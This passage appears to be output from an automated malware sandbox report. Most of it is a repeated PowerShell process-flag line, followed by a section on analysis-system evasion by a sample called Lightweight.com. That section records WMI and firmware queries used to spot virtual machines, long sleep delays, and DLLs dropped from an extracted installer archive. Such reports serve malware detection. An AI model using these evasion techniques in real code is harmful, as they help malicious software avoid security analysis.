                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1977Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6483Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4287Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5531Jump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLLJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com TID: 6280Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1344Thread sleep count: 1977 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 6483 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4112Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2204Thread sleep count: 4287 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2204Thread sleep count: 5531 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\709182Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\709182\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696584680t
